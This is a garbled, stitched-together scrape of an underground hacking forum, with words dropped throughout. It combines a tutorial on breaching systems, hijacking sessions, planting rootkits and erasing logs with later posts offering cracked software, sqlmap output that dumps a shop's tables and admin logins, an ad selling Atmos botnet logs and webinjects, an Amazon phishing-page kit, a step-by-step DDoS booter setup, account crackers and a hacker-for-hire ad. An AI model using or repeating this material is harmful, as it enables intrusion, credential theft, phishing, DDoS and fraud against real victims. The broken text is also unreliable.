vulns exploits are used gain access the system. 
exploits can used for dos attacks too. 
watch the video tutorial. 
most holes exist from default configuration services and applications. 
webserver webservers are the most trageted section. 
all people contact the webserver thus you never know the hacker than normal user. 
webservers examples apache iis and tomcat. 
after you exploit the vulnerability your target webserver you can gain many different things such root access the gist website defacement dos put the server down theft alteration data server further penetration into the network. 
webserver great place start when you want penetration test database those software vendors who create databases applications such sql oracle etc they dont have security mind they care more into effeciency and how make easy for the users handle with the database. 
they care about making their customers happy without giving that much attention security issues tcp stack this not common used method hack systems. 
google application some examples application vulnerability buffer overflow weak authentication mechanisms poor data validation the most common one and poor error checking. 
alright discover these the target machine you need vulnerability assessment. 
this can done two ways manually automatically. 
manually means you try discover vuln. 
yourself which eventually you will have vuln. 
that nobody else knows you can use for yourself publish security sites. 
automatically means you rely tool that searches for vulns the target machine this tool has database full vulns. 
this 'tool' will only inform you the vulns found the target machine relying 'its' database. 
are going talk about auto vulnerability assessment. 
the most common wonderful tool nessus its free open source code alot common sense comes into play when analyzing vulns for example you not look for database vulnerability webserver things like that. 
another resources oval gives you good and basic foundation vulns assess. 
methodology frsirt keeps track vulns and make exploits these vulns you can join paid subscription and then browse vulns avaialbe their database and download exploits this good source for hacking security and websites for posting exploits such milw hacking sites. 
lets have closer look nessus tool nessus client server architecture. 
the process setting cumbersome. 
nessus have about plugins therefore takes time peroform the assessment. 
results can reviewed report. 
the report includes the found the target machine with short description about the vulnerability. 
note you can enable several plug ins plugin tab. 
you can specify range ports through scan options. 
specify the target you should the target tab. 
once have done the vulnerability assessment and knew what exit. 
start gathering exploits the found penetrate the system. 
lets talk about penetration and access after all information have gathered previously its the time break the system with the exploits you have. 
its the time stop gathering information and start breaking into system. 
the ultimate goal gain the highest level permissions. 
try use undiscovered techniques and methods. 
think out the box some exploits that enable penetration are buffer overflows stack exploits web services apps that allow access. 
aside from the standard methods penetration lets see penetration methods here are some examples sql injection ability change queries the application before its sent into database. 
application error handling this can result dos. 
probably one the most common vulnerability you can find corporate arenas. 
directory traversal browse directories you should not able. 
malformed packets one the more difficult methods penetration requires very extensive knowledge how tcp packets are assembled and disassembled. 
but once you get used its probably the most effective ways hacking. 
bypassing access controls password cracking most common means accessing systems. 
social engineering guess you know what means. 
sniffers take passwords right off the wire alot protocls and application such http ftp communicate parrwods over the wire plain text. 
session hijacking similar sniffers but you don't gain password because take off the entire session hijack the victim's session act you are him. 
usually when you get passwords you get encrypted hashed hidden some way another. 
password cracking can done several ways examples brute force attack every password can and will broken brute force attack. 
depends the size the password. 
dictionary attack less effective than brute force relies list words phrases. 
hybrid attack combination different tools. 
combination effectivence brute force and dictionary attacks often using other attack mechanisms such cryptanalysis attack one the hybird attack. 
you should know that when you sniffing you often get usernames passwords plain text. 
however you can get encrypted passwords from sniffing well. 
you will need use the cracking techniques discussed above. 
sometimes cracking encrypted passwords can take secs hours days months even more there great software called cain abel sniffs passwords from the wire cracks etc. 
once you install sniffers tab then move the found passwords cracker tab see what you have got there lots. 
you should know these techniques security person cause you don't know black hat will take care. 
now assume already have hacked the system. 
will try different things such getting the root etc. 
penetration compromise got some differences the meaning. 
hacking into system does not mean you have compromised taking the full control take over the system. 
after you penetrate the system you can grab the session between client and server. 
you keep listening login sessions when the remote user login google the session dropped you once you get the session the remote user won't able get into his account she will see page goes blank disconnected she may think its problem connection thus she tries login again everything works fine but you already got his session you won't have through login page when you want see his her email inbox cause its already among the whole session you have taken. 
another way this lets say the attacker has compromised the user's system thus the attacker can let the session drop his machine then takes the session reads and saves. 
after that redirects the user the server this step will make everything works like nothing wrong happen. 
lets see example the above explained steps after attacker installs cain abel application moves attack base system click the sniffer button the top click the yellow button apr poisoning button besides the sniffer button. 
this apr poising button trick the attacked system talk the attacker instead normally who talks. 
for testing purposes and add various system addresses ip's the list. 
let say one the user amongst those targeted ip's logon into 'google' the authentication process you will notice varies pieces info comes you. 
you are gathering info getting into the middle the communication process. 
now view the files you have got the list you can see among the lines the username password the users' 'google' account plain text how dangerous this can your privacy careful. 
once the hacker gains access the system. 
aims for admin root access. 
moves from guest level user level root level. 
owning the box means take the system prevent the admin from controlling the system well preventing other hackers from getting. 
you hackers usually move from the regular level the admin level they can have full control. 
hacker needs privilege escalation compromise the system well. 
some exploits allow buffer stack overflows obtain admin access. 
all takes guest user then hacker can perform exploitations locally there goes the root. 
this point did everything owning the box. 
now our goal protect our access. 
thus want maintain our access that hacked system can use later. 
you can maintain system using such tools backdoor accounts backdoor software programs rootkits etc. 
these tools help you maintain access. 
some hackers own the box close all other accounts except his account the security person shut the system down reformat the system and start over again. 
doing this hacker account will gone. 
once ensure have maintained our access the system then want expand ourselves other parts the network. 
remember you not this your own network somebody else will take care. 
does not think you will too happy once you got access and could maintain successfully. 
you want prevent detection loss access. 
there are several methods maintain access such rootkits exploits erase tracks install trojans that make you access backdoor enable null sessions webmaster usually the registry disable null sessions keep that vuln. 
from being exploited webmasters usually once not get back. 
you can there enable note enabling null sessions you can give other hackers chance hack too and many more. 
there different ways system compromise system compromise usually depends your goal examples system compromising are root access ultimate goal data access theft dos and many more. 
keep mind compromised systems can detected after while. 
now after hacker breaks into the system tries portect what has hacked erase his tracks. 
during the attack process try not detected the webmaster don't shut the server off well not forget erase your tracks. 
you dont want the webmaster see lots failed logon the log files you erase tracks prevent future detection. 
typically get the network shadow ghost. 
there are many method evade those ids they don't cut off your attack stream. 
common methods for evading defenses might fragmenting packets some programs that. 
fragroute port redirectors encoders change the flow the look and feel various traffics pass firewall. 
after you get and deceive defenses you want the log files and erase your tracks. 
remember sometimes you get user account then you get into root changing permissions the user account you have remember set this user permissions back was things like that you know what mean put yourself hackers shoe. 
don't delete the whole log files this can make the security person more suspicious. 
want leave everything was nobody can get feel that intruder was here. 
safe you should know where your actions are recorded delete log files and other evidences that can get you caught steganography google and evading ids firewalls. 
all actions are recorded some place the system the network. 
assume ids detects you what security persons usually when you get detected they may cut off all the ways for you you don't get chance penetrate they probably going track you down they may decide let you but watch you the entire time. 
where are your actions recorded what things can let security person knows that you hacked his system they are recorded log files for various applications. 
iis apache log files file access times note there are tools for hackers that allow you modify file access time windows registry entries hacker tools left behind aware the residual configuration you have left behind make sure you set all the configurations back was performance stats ids proxy servers make sure how you send and receive data. 
you are going use proxy server set permanent tunnel through the proxy the remote host that compromised and firewalls usually very rich with logs. 
there are various types ids ids can set anywhere the network. 
there are network based ids host based ids and application based ids. 
deleting evidences your hack extremely difficult requires you have very high knowledge the system you are trying compromise all the prior steps did such scanning foot printing etc will handy compromise the system. 
easy cover the known log files such web logs firewall ids logs etc. 
however important know how the default logs work. 
highly skilled hackers study the target well take the time fingerprinting footprinting everything properly. 
may take him one week before hacks the target but when penetrates his job done more smoothly quietly. 
unlike the other ones who are just using some tools break the system fast possible without studying the target well. 
possible delete log files simple but usually requires admin access. 
some files logs may deleted automatically with reboot. 
don't delete log files brings suspicion. 
you the security person can indicates very clearly that hacker broke into the system. 
most common way hiding your tracks using rootkit. 
rootkit set tools used attacker after the attacker gets the root access system. 
rootkits conceals keep from being observed attacker activities the hacked system. 
once rootkit set the system its practically impossible rid because rootkit uses technology called hooks that usually most the time embed itself into various components effectively the going toaster when the rootkit all set and done. 
security person has rebuild his machine when rootkit detected after properly investigate. 
steganography its about hiding file into another file. 
like hiding malware into normal software which makes difficult for firewall detect the malware. 
thats the basic concept steganography. 
there are alot tools out there allow hide files inside another files. 
you can evade ids firewalls using random slow stealth scanning technique traffic goes unnoticed this takes longer scan but makes detection more difficult. 
try use non standard techniques think outside the box. 
remember not everyone out there security expert. 
secure your system well you need put yourself hacker set mind. 
now you have learned the basic methodology that hackers use break into the system. 
anyhow lets take closer look hacking techniques such encryption sql injection sniffers and many more. 
encryption files can encrypted storage. 
communication channels can encrypted well communication channel encryption encrypts the entire communication path all traffics sent and received are encrypted. 
ssl technology encrypts the entire communication path. 
there are many ways hackers get away encrypted traffic get info not encrypted form. 
you are using your own encryption method you always should test your encryption for crackability before you use officially. 
sniffers sniffers common tool used hackers. 
sniffers listens any traffic that goes through the wire the target system listens ins and outs traffics. 
promiscuous mode mode that listening for any traffic that goes through the wire. 
standard promiscuous mode sniffer basic technique. 
there are more advanced techniques other than promiscuous mode. 
sniffing enables the attacker pick plain text and other sensitive data that goes 'from' 'to' the target. 
sniffers record captured traffic then after you sniff you can offline start analyzing that captured traffic. 
popular sniffers are ethereal etherape ettercap and network monitor for win only not effective. 
wireless hacking this new technology starts taking place nowadays. 
easy setup but not frequently secured since not many people understand the security configuration they decide not set set poorly. 
there are various tools that detect wireless networks popular war driving software are netstumbler airsnort airopeek kismet and many more. 
what war driving google sql injection sql injection technique that allows attacker steal valuable database information. 
this attack relies poor data validation and poor error checking. 
buffer overflows buffer overflow common the cause buffer overflow poor coding. 
buffer overflows might noticed while coding. 
buffer overflow happens when the programmer does not clearly define boundaries buffers variables. 
use out bound data insert malicious code execute command the remote host. 
buffer overflows can cause programs freeze lockup can cause machine crash let you use exploits leads you compromise the system. 
build buffer overflows you need good programming skills good knowledge stack and buffer vulns. 
you need have the ability research analyze vulns apply the exploit achieve what you want. 
buffer overflow very common hard produce application with buffer overflows all. 
there nothing programmers can about they just need write the code with security mind set. 
unexpected buffer overflow appears later chance programmers will have fix. 
programmers should test their code from much they can before they publish the application. 
rootkits common hacker technique. 
rootkit malicious program that replaces components. 
rootkit requires root permission you can install. 
linux rootkits are common you can find them everywhere unlike windows. 
very hard detect rootkit because embeds itself deeply into the target system. 
removing rootkit from system very hard too the security person tries remove the rootkit out the system will destroy the system since the rootkit embedded deeply into the system into components. 
the good solution format the whole system install again. 
spoofing the word spoofing defined making yourself appear somebody else. 
examples spoofing you can spoof address and make yourself appear somewhere else mac addresses and emails very simple spoof you send email somebody changing the headers and things like that. 
spoof usually relies poor implementation tcp itself poor implementation applications. 
tools that are used for spoofing differs from one platform another. 
example the tools spoofing utilities mac address modifiers etc. 
spoofing more into using your skills rather than using tool. 
denial service dos dos very common. 
the ultimate idea prevent legitimate users from using the system. 
running dos very simple you don't gain anything from doing dos. 
hackers threat companies things like that. 
many methods level dos attacks exist. 
examples some ways dos ping death windows size overflow smurf teardrop attacks and many more. 
there are lots different ways web hacking web hacking the most popular attacks. 
based hacking individual sites servers components based the website. 
first step hacker takes enumerate services applications target machine and then determine what webserver software apache iis etc running the target system. 
after that the hacker exploits against vulns. 
found the target system. 
will easier hack the hacker knows the version the service software running. 
webserver attack leads deeper penetration the network move into the target's internal network. 
popular attack methods are cross site scripting iis dll iis very commonly exploited directory traversal unicode attack and many more. 
what unicode attack here quick rough description about unicode attack lets say you want pass space into url. 
you put space url webserver will not take your url webserver will consider the url invalid. 
thus you want put spaces among the url you should put the number place the space number represents the space when the url goes the webserver the webserver says thats valid url lets process and does. 
unicode attack uses this technique non standard bad way way attack the webserver. 
thats quick explaination about unicode attack. 
i'm already about finish this tutorial will just talk about popular tools brief manner. 
will start with namp. 
nmap the most popular hacker tool outhere. 
linux command line nmap works better and supported better. 
nmap comes with ping utility port scanning utility service enumeration fingerprinting. 
superscan windows based tool developed foundstone inc. 
its easy use good tool for windows. 
nessus used for vulnerability assessment. 
open source software kit with commercial version available well. 
nessus uses client server architecute. 
server will installed central location. 
nessus comes gui command line interface. 
nessus uses database that carries latest current exploits for all types application. 
databases nessus are called plug ins hundrends vulnerability plug ins exist and are updated daily include latest exploits. 
nessus requires high level knowledge use the tool very effeciently. 
you can out the web and download exploit and then add the database. 
nessus can take quite long time vulnerability assessment. 
finally the information this tutorial have been gathered from various types sources and then wrote the tutorial organized manner from scratch well added some stuff clarified many parts. 
after you have read this tutorial recommend you search and learn about windows null sessions the most critical flaws associated with windows and google about dns zone transfers this tutorial good guide for you that gives you insight how start different techniques that hackers use and how they are used. 
hope you have enjoyed this tutorial helped you someway another. 
i'm not supporting any illegal activities. 
this tutorial for people who wants know how hackers think what steps they take break into systems how they people can have insight how protect themselves against intruders. 
this tutorial made for educational purposes only. 
bitcoin hacker satoshimines bot url url. 
com rvmqxdwhoaqhbq rhurz cdw download here. 
color guys new fresh proxy list here. 
blues wrote want try this. 
hope this one works. 
wrote thanks bro for sharing. 
just love more say. 
beta full version software free download with serial key crack. 
about program which uses almlaeyen winzip excellent choice with his functions the two programs mentioned the usual also features the beauty its appearance addition dozens interfaces different suit all tastes very powerful software and huge deal with compressed files and supports several types including zip cab lha lzh tar tar. 
rar arj arc ace zoo bzip mime uue and many other formats and also the property backups and also compressed file transfer feature exe executable file conversion and alsocompressed files from one type another type really wonderful program and one the powerful software and best daft and open files. 
winrar puts you ahead the crowd when comes compression. 
consistently creating smaller archives winrar often faster than the competition. 
this will save you disc space transmission costs and valuable working time well. 
winrar ideal for multimedia files. 
winrar automatically recognizes and selects the best compression method. 
the special compression algorithm compresses multimedia files executables and object libraries particularly well. 
winrar powerful archive manager win. 
rar files can usually compress percent percent more than zip files can. 
winrar powerful compression tool with many integrated additional functions help you organize your compressed archives. 
can backup your data and reduce size email attachments decompress rar zip and other files downloaded from internet and create new archives rar and zip file format note keygens patches activators cracks loaders etc. 
are always scanned with avast internet security latest version virustotal avoid virus issues. 
different anti viruses may give different results install note step please use zip winrar universal extractor extract files. 
step run the setup step use keygen patch. 
thanks will get this and try out. 
let try this stuff. 
very useful infromation for beginners dash. 
this article will help you change your address within minute. 
just follow the following step and you will thru. 
click start the bottom left hand corner screen. 
type command and hit you should now msdos prompt screen. 
type ipconfig release just like that and hit enter. 
type exit and leave the prompt. 
right click network places network places your desktop. 
click properties you should now screen with something titled local area connection something close that and you have network hooked all your other networks. 
right click local area connection and click properties. 
double click the internet protocol tcp from the list under the general tab. 
click use the following address under the general tab. 
create address doesn't matter what. 
just type and until fill the area. 
press tab and should automatically fill the subnet mask section with default numbers. 
hit the button here. 
hit the button again you should now back the local area connection screen. 
right click back local area connection and properties again. 
back the tcp settings. 
this time select obtain address automatically tongue. 
you now have new address with little practice you can easily get this process down seconds. 
this only changes your dynamic address not your isp address. 
you plan hacking website with this trick extremely careful because they try little they can trace back. 
i'm buying giftcard codes exchange for bitcoins. 
please add skype sunniesunnie for more details. 
the main access code verifying the necessary. 
thanks mate for sharing but pls show tutorial and link download interested. 
rafiqctg wrote friends enjoy dont change password url thanks. 
parse error syntax error unexpected string expecting appserv. 
privateloader wrote there are commercial and cracked software that are way better. 
virustotal i'm not using. 
rafiqctg hope they still work for have view. 
thanks wrote today here with bumper collection. 
build final full version software free download with serial key crack. 
about internet download manager has smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology accelerate your downloads. 
unlike other download accelerators and managers that segment files before downloading starts internet download manager segments downloaded files dynamically during download process. 
internet download manager reuses available connections without additional connect and login stages achieve better acceleration performance. 
released jun added support for new types video streaming sites added workaround for youtube changes fixed bugs click here get download links. 
just got scammed steam for very expensive knife will pay see returned. 
have just including primary secondary wins dns. 
cpanel attacker using proxy lists download size click here for download size size click here for download size. 
about computer and network security complex subject and ever moving target. 
start session and get the interactive commandline access remote windows box wmf file code execution vulnerability metasploit ssh dynamic port forwading sniffing voip using cain use brutus crack box running telnet cain arp poison and sniff passwords using network activ sniff webpages network content session understand the purpose the course and the phases hacking acquire the hardware and software for your laboratory build the windows hacker tool analysis laboratory build the linux hacker tool analysis laboratory test your laboratory and keep secure session understand low tech and computer based reconnaissance use sam spade gather information about target search the web for interesting target information session understand scanning techniques search for modems using thc scan develop network map using cheops conduct port scan using nmap scan for using nessus content session analyze buffer overflows crack passwords windows and linux sniff data from the network using sniffit use netcat the swiss army knife hacker tools session analyze application level trojan horse backdoor vnc analyze traditional rootkit lrk analyze kernel level rootkit kernel intrusion system session understand file hiding windows understand file hiding unix analyze protocol tunneling using reverse shell analyze covert channels using covert tcp click here get download links. 
gud job man this job welcome the link been deleted. 
ghhj etc surprising fixed houseleek. 
mrneven wrote you're using the target's computer then you can look for saved passwords. 
nope i'm not using victim's comp. 
i'm using mine need help asap. 
ertainment attach config attach looks something like this heres the log initial probe. 
sqlmap identified the following injection points with total requests place get parameter cat type boolean based blind title and boolean based blind where having clause payload cat entertainment' and and 'romc' 'romc type stacked queries title microsoft sql server sybase stacked queries payload cat entertainment' waitfor delay type and time based blind title microsoft sql server sybase time based blind payload cat entertainment' waitfor delay web server operating system windows vista web application technology asp. 
net asp microsoft iis. 
back end dbms microsoft sql server sqlmap identified the following injection points with total requests place get parameter cat type boolean based blind title and boolean based blind where having clause payload cat entertainment' and and 'romc' 'romc type stacked queries title microsoft sql server sybase stacked queries payload cat entertainment' waitfor delay type and time based blind title microsoft sql server sybase time based blind payload cat entertainment' waitfor delay web server operating system windows vista web application technology asp. 
back end dbms microsoft sql server available databases crown master model msdb tempdb sqlmap identified the following injection points with total requests place get parameter cat type boolean based blind title and boolean based blind where having clause payload cat entertainment' and and 'romc' 'romc type stacked queries title microsoft sql server sybase stacked queries payload cat entertainment' waitfor delay type and time based blind title microsoft sql server sybase time based blind payload cat entertainment' waitfor delay web server operating system windows vista web application technology asp. 
back end dbms microsoft sql server database crown tables crown. 
test attdescp customer catlist categorylist claritycolor configuration coupon couponuseby gctemp linkpages manflist metallist old payment paypaltemp payment remove returnrequests ringsizes saleproduct statelist stonelist subcatlist tdetail tdetailold temppaydetail trackreferral transrejected transtrack transvalues transaction backup usedcoupons xsubcat yesno crown. 
tmpclp tmpclp tmpclp tmpclp tmpclp adminlogin categories check sysuser coupontype cusshipinfo dtproperties dupcustomer products referal referal arch sozo vdetails vtdetail xdpc xkientom xlala xlalu xlula xlulu xthang xthanggiang xthanggiangho xtomkien dbo statelist sqlmap identified the following injection points with total requests place get parameter cat type boolean based blind title and boolean based blind where having clause payload cat entertainment' and and 'romc' 'romc type stacked queries title microsoft sql server sybase stacked queries payload cat entertainment' waitfor delay type and time based blind title microsoft sql server sybase time based blind payload cat entertainment' waitfor delay web server operating system windows vista web application technology asp. 
back end dbms microsoft sql server database crown table adminlogin entries log uname pword crownj crownj sqlmap identified the following injection points with total requests place get parameter cat type boolean based blind title and boolean based blind where having clause payload cat entertainment' and and 'romc' 'romc type stacked queries title microsoft sql server sybase stacked queries payload cat entertainment' waitfor delay type and time based blind title microsoft sql server sybase time based blind payload cat entertainment' waitfor delay web server operating system windows vista web application technology asp. 
back end dbms microsoft sql server. 
thanks man didn't think was legit but yeah all good. 
you can simply click the select button and choose the free itunes code value you want. 
are broken link refreshes. 
thanx dude keep going. 
rafiqctg wrote friends enjoy dont change password url good. 
boss i'm replying post said pls need read the tutorial. 
parents and bros died war and body help. 
need survive and live better life. 
you decided help others posting helpful tutorial here allah will also help you the higher level. 
why don't you post the tutorial here like you're supposed your externally posted link longer alive. 
reply view mess constructive forum. 
zip crc cde adef efe. 
hey guys here free extension spoofer made autoit. 
thank you very much for share realy working looks good snap but lets seethe truth will open after comment. 
intersting looking for something like this. 
suring mot ions gas vulnerable. 
org tenement talks details. 
php ville herouxville vulnerable. 
depending the traffic volume and usage mode the requirements may hight operating systems and bit windows windows server windows vista windows server windows how does this work. 
sell logs txt format from atmos botnet may june mix other world. 
and sell atmos botnet webpanel builder webinjects. 
things will provide you latest version unlimited. 
talk jabber for hosting specs. 
blockage tracker and other unwanted traffic. 
latest functioning webinjects for all financial institutes usa. 
full installation webpanels configurations all plugins including rdp module. 
bho module bypass activity. 
kill module kill system erase hdd and mbr. 
many loaders with and without fakes. 
mimikatz all users system privilieges. 
module for union with different soft. 
dll side loading with panel. 
btc only jabber buhtrap. 
south carolina united states blacklist checked. 
alberta canada blacklist checked. 
louisiana united states blacklist yes checked. 
tacoz wrote hey guys finally releasing own hack pack there lots stuff this big pack enjoy download. 
wsoso password for file tacoz sure smack that. 
thank you will give try. 
run hideman press button under hours nothing will happen other than loading its payment menu click month option will open web page just close now close hideman completely using system tray icon hideman installation path and delete pref. 
cdat file example path program files hideman bin. 
hmm what this shit. 
let's crack some thank you. 
please don't hide the answeres the users here will give for its diffuclt the first place get such software. 
love the pakage the xelf confidence post this pakage. 
margaret peters danbury bldg ste wilton connecticut see address see address see address united states thank rep. 
hack url hide end notes thank you for taking your time read this tutorial. 
ohio united states blacklist checked. 
mississippi united states blacklist yes checked. 
must must wanna test. 
fern cookie hijacker new feature add fern wifi cracker. 
wifi based session hijacking tool able clone remote online web sessions sniffing and capturing wireless cookie packets from remote hosts intercepting reachable wireless signals. 
capable decrypting wep encrypted packets the fly process session cookies transmitted over the air. 
fern cookie hijacker comes with smart intergrated code detect and intercept cookie packets unlike some cookie detection engines fern cookie hijacker does not wait collect complete cookie during the initial authentication process but pulls cookies and associate them with their hosts they are transmitted over the wireless connection its also forges correctness values that are not captured. 
amazon scan page this and page scan amazon works perfectly just download and enjoy files. 
htm this file contain the amazon fake page. 
php this file will redirect the user google once you downloaded the files then upload your web hosting site then when your victim enters username and password then file will come passes. 
txt that file will contain the username and password say atleast thanks for making this and giving for free because other people charge money for this download link. 
unuc pass page enjoy thnx rep. 
bourdj wrote you have look the linkwow wow url want answers pls wow. 
survey out plus more. 
gesendet von meinem xperia ultra mit tapatalk. 
email account checker reiluke works yahoo gmail hotmail download here. 
qcqmeb virus scan report. 
the easiest way perform phishing free fake pages. 
visit this link and register then get you own personal free fake pages fake free fake pages education security example site available facebook tweeter paypal skype etc. 
click search home show off all forums community upgrade vip account search search forum help help documents money make money more more links offensive community xvyctim offensive community hacks exploits and various discussions advanced hacking tutorials tutorial how hack details announcements some other awesome news share pages previous. 
jump page new reply thread rating thread modes tutorial how hack details deadbang offline junior member posts threads joined oct reputation location money. 
donate good share can can load that donation for some info which needed please rajj offline junior member posts threads joined jan reputation location west java country indonesia money. 
donate hours ago executioners wrote see this still works pls xander offline junior member posts threads joined mar reputation money donate hours ago maybe like inviato dal mio asus tapatalk enter keywords search thread pages previous. 
thread author replies views last post hot tutorial hacking lol chat hack virg hours ago last post rajj online exclusive hack redkid hours ago last post rajj hack almost everyone. 
every facebook and email via facebook hack sruthy last post pootr hack gmail account using original domain address for phishing web page electra last post cybarex hack anything makinged last post azairek diff hack sarveshmehta last post sarveshmehta how hack websites servers last post nikkon how hack server linux vps when conected bourdj last post how hack with just address pritam last post pratham rfi remote file inclusion tutorial swapnilhaxor details swapnil haxor last post xepr view printable version send this thread friend subscribe this thread forum jump users browsing this thread xvyctim about offensive community offensive community world best underground hacking forum that provides tutorials latest hacking techniques free tools and great online teaching our members. 
all member minecraft account cracker advanced account cracker which attempts crack accounts using default password. 
here are its features. 
random account username selection. 
uses proxies virus scan report. 
lci legu download link. 
thanks for access the account works great. 
this tutorial will teach you how maintain and create your own stresser otherwise known booter. 
have another tutorial this. 
this tutorial updated more detailed and gives even better source. 
please leave feedback questions even you think should add something please don't hesitate. 
uploading your files sector. 
uploading and configuring mysql databases sector. 
mandatory file edits sector. 
activating your account and making yourself administrator sector. 
accessing the administrator control panel sector. 
you may this far but you may not know what stresser booter even. 
stresser uses shells api's attack certain location. 
these will send certain amount packets the desired location and sends enough packets will force the server connection flood and simply crash. 
when router connection network crashes that server cannot handle the amount incoming packets. 
com pbe debx shell checker. 
net introduction sector note please note have spoilered image have bandwidth. 
click view spoiler view tutorial related images thank you. 
welcome sector one this tutorial. 
this stage will teaching you the following how setup your hosting. 
how upload and configure your stresser. 
for tutorial purposes i'm simply going use hosting website called. 
com would not advise using this website you will not able send attacks. 
they have fsock disabled. 
said this site just for tutorial purposes. 
would advise getting cheap hosting here hackforums the hosting marketplace. 
once you have your hosting you will want upload your files that you originally downloaded above. 
only upload the files within the source folder included the download. 
there point uploading the banner. 
upload your files download filezilla. 
org use the file manager your hosting's cpanel. 
uploading and configuring mysql databases sector once you have your files uploaded. 
into your cpanel and create mysql database. 
the majority hosts not all will all come with mysql installed. 
remember the information used. 
after your database has been created now want edit three files. 
the three files are below mandatory file edits sector need edit the files our stresser can connect the mysql database. 
php line and dbc. 
php this self explanatory. 
the top you will see the lines below. 
the lines below explain exactly what edit. 
edit the information within the. 
like have done below. 
php code define host mysql. 
com set database hostdefine user set database userdefine pass example set database passworddefine name set database name line this your database host. 
line this your database username. 
line this your database password. 
line this your database name. 
you haven't caught now. 
you need input all your mysql information into those fields. 
php the top shellcounter. 
php will look like this php code start configuration section mysql username mysql user name mysql password 'example mysql password mysql hostname 'mysql. 
com' mysql host name mysql hostport mysql host port mysql database mysql database mysql shelltbl 'shellpool' mysql table name will created does not exist mysql stengine 'myisam' preferred mysql storage engine myisam mrg myisam innodb you will only need edit the following with your mysql database information php code mysql username mysql user namemysql password 'example mysql password mysql hostname 'mysql. 
com' mysql host name mysql database mysql database leave everything else. 
ports for example leave them. 
php would recommend getting notepad. 
org navigate line numbers easier. 
read above for the lines that need edited. 
line edit the obvious fields. 
i've inputted database information. 
php code function ezsql mysql dbuser dbpassword 'example dbname dbhost 'mysql. 
com' line once again edit the obvious fields. 
dbuser the database username and. 
php code function connect dbuser dbpassword 'example dbhost 'mysql. 
com' line finally for short one line just the database name. 
php code function select dbname configuring phpmyadmin sector welcome sector this tutorial. 
this will teach you how configure your phpmyadmin with your stresser source. 
please don't over think this. 
may seem overwhelming but it's incredibly simple. 
your cpanel should have phpmyadmin. 
locate the import button located the top phpmyadmin spoiler once you're the import menu. 
sql file the jeejee power folder. 
like below spoiler then after click like provided below. 
spoiler then you should get success message and the databases should appear the side. 
accounts sector welcome sector this tutorial this sector will learning how register our account activate and then proceed give our self administrator rights and access the admincp. 
you will want locate yourdomain. 
php course replace yourdomain with your actual domain this just example. 
creating account sector you will now the login page like below. 
you get mysql error you have input your mysql details the edited pages incorrectly. 
spoiler click the register button and register your account. 
spoiler now your account registered. 
we're not done yet spoiler activating your account and making yourself administrator sector now back phpmyadmin. 
click the table called 'users' the side and then click browse button the top just like when you clicked import. 
spoiler you should see your own profile spoiler you want click edit which course the little pencil button. 
you need change the values. 
change the user level value. 
this will make you administrator. 
then you want change the approved value from approve your account. 
your account now active and you're administrator spoiler accessing the administrator control panel sector the control panel yourdomain. 
php obviously replace yourdomain. 
com with your own once again. 
from here you can change your booters name add shells post new bulletins read logs create users active users and more shells api's sector. 
you're finished you want get going right right. 
unfortunately this the hard part. 
well easy but then again frustrating and can time consuming. 
you need shells api's for your booter stresser work. 
here are your options buy shells from people the marketplace. 
get your own from pastebin and use shell checker provided the downloads. 
request free shells look for giveaways. 
thanks bro keep sharing sent from using tapatalk. 
the following tut show how install and setup web server your host your own website files for the world access. 
this all can done behind vpn. 
before anything have install betternet vpn. 
this free one click service. 
personally recommend betternet they not log anything. 
virus scan results virustotal scan results abyss web server click here for results click here for results duc setup click here for results. 
install betternet click here. 
after install click connect. 
small icon will systray and shes smilling you are good betternet will install tap adapter and all internet traffic will through the vpn server and all information secure. 
create host the name your site. 
you are behind nat router your isp blocks port you will have use port redirect and forward the port your router and setup the web server with the correct port you selected. 
assuming you will know how that. 
you want fork over the coin you can buy premium account have wilcards which allows you have. 
you should automatically populate. 
does not use the betternet vpn your own you decided not use betternet. 
there section that allows you mask your host. 
would suggest you fill this section out. 
this when someone puts. 
com their browser will populate what you masked instead your. 
download duc setup click here. 
install duc software keep your host updated with your new when connecting with vpn your not static. 
com and login through the app with your. 
after login the following screen will appear. 
click edit host and make sure your host yoursite. 
org you created checked off then click save. 
org configured with your. 
now the web server. 
install abyss web server and start the server click here. 
another box will tell you configuration file was created. 
your default browser will now open the url. 
which the abyss web server console. 
here you need select your language and then click. 
the next screen enter suitable username and suitable password the click. 
after clicking you will asked enter your username and password into the login box. 
abyss web server now installed and you are now presented with the console. 
test abyss web server working port the default port for serving websites type. 
org into your browser and click. 
you see the screen above then abyss web server ready start serving your website. 
all you need now start adding your website and files into your htdocs folder which default located program files abyss web server htdocs. 
now its you design your own website what you will with the server. 
nebraska united states blacklist yes checked. 
australia blacklist yes checked. 
that's cool hope fake. 
you may already know mobile prank hacktool tool for mobiles. 
gives the power send sms and calls from diferent web services. 
the mobile prank hacktool was created necessity send sms call pranks from computer and play with anyones phone long you know the number. 
what started joke tool has become comercial tool which wasn't intend this will the last release. 
have added cool layout and mobile prank hacktool now full spa single page application tool. 
you enjoy playing around with mobile prank hacktool consider making small donation hitting the button donate. 
this keeps developing tools that are release for free anyone. 
rar virustotal this html file harm will your device and works all platforms. 
really really want tos see this thanks. 
moore senior member icefog the founder metasploit. 
you are looking for professional hacker who has put the world awe with his dexterity then you have come the right place. 
com professional the services mentioned below services include email hack upgrade university grades facebook whatsapp line skype hack instagram twitter any social media account hack catch cheating husbands wives boyfriends and girlfriends remove and erase criminal records keyloggers drivers licence delete unwanted online pictures and videos any website phone hacking. 
android iphone hack cell phone jammer mastercard paypal bitcoin western union money gram with untraceable credit etc. 
also develop hacked facebook twitter instagram yahoo gmail passwords etc. 
custom software and web development php java asp. 
computer analyst and consultant school transfer hacking computer games casino odds and bank logins credit transfer credit wipe repair credit report verified accounts for transfer sales dumps cards all kinds. 
get questions before the exam hacking university portal background checks employee competitor monitoring bank legal hack discover hidden assets etc monitor your employees access your client competitor rival information and all related services also perform other services like hack into any government agency website hack into any data base system and grant you admin preveledge hack wordpress blogs server crashed hack untraceable and much more. 
can restore lost files and documents matter how long they have been missing website crashed hack server crashed hack databases hack sales dumps cards all kinds untraceable individual computers hack control devices remotely hack burner numbers hack verified paypal accounts hack word press blogs hack text message interception hack retrieve messages deleted data and recovery messages cell phone also sell high grades techs and hacking chips and gadgets you are interested spying anyone. 
sell software apps for hacking service. 
already hacked online shopping pins for sale give away price windows hacking tricks constantly get free talktime from your network provider have records from our client well highest repeat hire rate. 
our work speak for ourselves provide perfect software solution all clients. 
believe mutual growing with client and hence work technology partner and consultant for our clients note please note payments are required front avoid time wasters all jobs range from hrs hrs max client satisfaction moore's priority you get your money's worth you refer client result the previous job done for you you will stand chance getting any job your choice hacked for you free charge. 
